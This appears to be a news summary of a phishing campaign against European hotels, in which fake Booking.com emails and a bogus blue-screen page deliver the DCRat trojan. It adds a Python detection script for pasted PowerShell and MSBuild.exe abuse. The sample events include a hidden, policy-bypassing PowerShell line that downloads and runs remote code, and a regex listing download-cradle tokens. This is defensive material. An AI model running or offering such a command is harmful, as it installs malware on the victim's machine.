What's Happening?
A new phishing campaign, dubbed PHALT#BLYX, is targeting the European hospitality sector by using fake Booking.com emails to deliver a remote access trojan known as DCRat. The attack begins with a phishing email that impersonates Booking.com, urging recipients to click a link to confirm a reservation cancellation. This link redirects victims to a fake website that mimics Booking.com and leads them to a bogus blue screen of death (BSoD) page. Victims are instructed to execute a PowerShell command, which deploys DCRat. This trojan can harvest sensitive information and expand its functionality through a plugin-based architecture. The campaign uses living-off-the-land techniques, such as abusing trusted system binaries like MSBuild.exe, to maintain persistence and evade detection.
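The two steps in that chain that leave the clearest host-side trace are the victim-pasted PowerShell command and the later MSBuild.exe launch. The following Python is an added detection example, not code from the report or from any vendor it cites: it runs two process-creation rules over a handful of constructed Sysmon-style events (field names follow Sysmon Event ID 1; every path, user name, URL and command line is made up). The PowerShell rule looks for a shell started from explorer.exe, which is where a command pasted into the Run box or a terminal lands, carrying generic download-cradle or evasion switches; the MSBuild rule looks for a parent outside an assumed allow-list or a project file under a user-writable directory. The token list and the parent allow-list are assumptions to tune per environment, not the campaign's actual command lines, which the report does not quote.

```python
"""Process-creation rules for the ClickFix-style PowerShell launch and the
MSBuild.exe living-off-the-land step described in the PHALT#BLYX writeup.
Sample events below are constructed for the example, not real telemetry."""
import re
from pathlib import PureWindowsPath

# Constructed Sysmon Event ID 1 style records: one user-pasted PowerShell launch,
# one MSBuild run driven by that shell, and two benign events for contrast.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -ep bypass -c \"iex (iwr http://example.invalid/x)\"",
     "User": "HOTEL\\frontdesk"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"MSBuild.exe C:\Users\frontdesk\AppData\Roaming\update.xml",
     "User": "HOTEL\\frontdesk"},
    {"Image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "CommandLine": r"MSBuild.exe C:\src\app\app.csproj /t:Build",
     "User": "HOTEL\\dev"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\Scripts\nightly-backup.ps1",
     "User": "HOTEL\\svc_backup"},
]

# Generic download-cradle and evasion switches seen in user-pasted one-liners.
# Assumed heuristics, not the campaign's actual command line.
SUSPICIOUS_PS_TOKENS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|-ep\s+bypass|iex\b|invoke-expression|"
    r"iwr\b|invoke-webrequest|downloadstring|frombase64string)",
    re.IGNORECASE,
)

# Parent of a shell launched interactively by the user (Run box, Start menu, terminal).
USER_SHELL_PARENTS = {"explorer.exe"}

# Assumed allow-list of processes that legitimately drive MSBuild.exe; tune per environment.
EXPECTED_MSBUILD_PARENTS = {"devenv.exe", "dotnet.exe", "msbuild.exe", "cmd.exe"}

# User-writable locations where a build project file should not normally live.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\public\\", "\\downloads\\")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path; works on any host OS."""
    return PureWindowsPath(path).name.lower()


def detect_clickfix_powershell(event):
    """Flag PowerShell started from the user's desktop shell with cradle/evasion switches."""
    if basename(event["Image"]) not in {"powershell.exe", "pwsh.exe"}:
        return None
    if basename(event["ParentImage"]) not in USER_SHELL_PARENTS:
        return None
    hits = sorted({m.group(0).lower() for m in SUSPICIOUS_PS_TOKENS.finditer(event["CommandLine"])})
    if not hits:
        return None
    return {"rule": "clickfix_powershell", "user": event["User"], "tokens": hits}


def detect_msbuild_lolbin(event):
    """Flag MSBuild.exe driven by an unexpected parent or fed a project from a user-writable path."""
    if basename(event["Image"]) != "msbuild.exe":
        return None
    parent = basename(event["ParentImage"])
    cmd = event["CommandLine"].lower()
    reasons = []
    if parent not in EXPECTED_MSBUILD_PARENTS:
        reasons.append(f"unexpected parent {parent}")
    if any(marker in cmd for marker in USER_WRITABLE):
        reasons.append("project file in user-writable path")
    if not reasons:
        return None
    return {"rule": "msbuild_lolbin", "user": event["User"], "reasons": reasons}


def scan(events):
    """Run every rule over every event and return the findings in event order."""
    findings = []
    for ev in events:
        for rule in (detect_clickfix_powershell, detect_msbuild_lolbin):
            hit = rule(ev)
            if hit:
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The two findings together, a pasted PowerShell command from the same user shortly followed by MSBuild.exe consuming a project file from that user's AppData, are the correlation worth alerting on; either rule alone will produce some noise in environments with developers or admin scripts, which is why the parent allow-list and path markers are kept as editable constants.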
Why Is It Important?
This campaign highlights the evolving tactics of cybercriminals who are leveraging sophisticated methods to bypass security measures and exploit trusted systems. By targeting the hospitality sector, the attackers can potentially access sensitive customer data and disrupt operations. The use of fake booking emails and BSoD pages demonstrates a deep understanding of modern endpoint protection mechanisms, posing a significant threat to businesses. The campaign's focus on European organizations, with phishing emails featuring room charge details in Euros, suggests a targeted approach that could have widespread implications for the industry.
Beyond the Headlines
The use of Russian language within the MSBuild file links this activity to Russian threat actors, indicating a possible geopolitical dimension to the campaign. The reliance on living-off-the-land techniques reflects a broader trend in cybercrime, where attackers use legitimate tools to carry out malicious activities, making detection and prevention more challenging. This underscores the need for enhanced cybersecurity measures and international cooperation to address the growing threat of cyberattacks.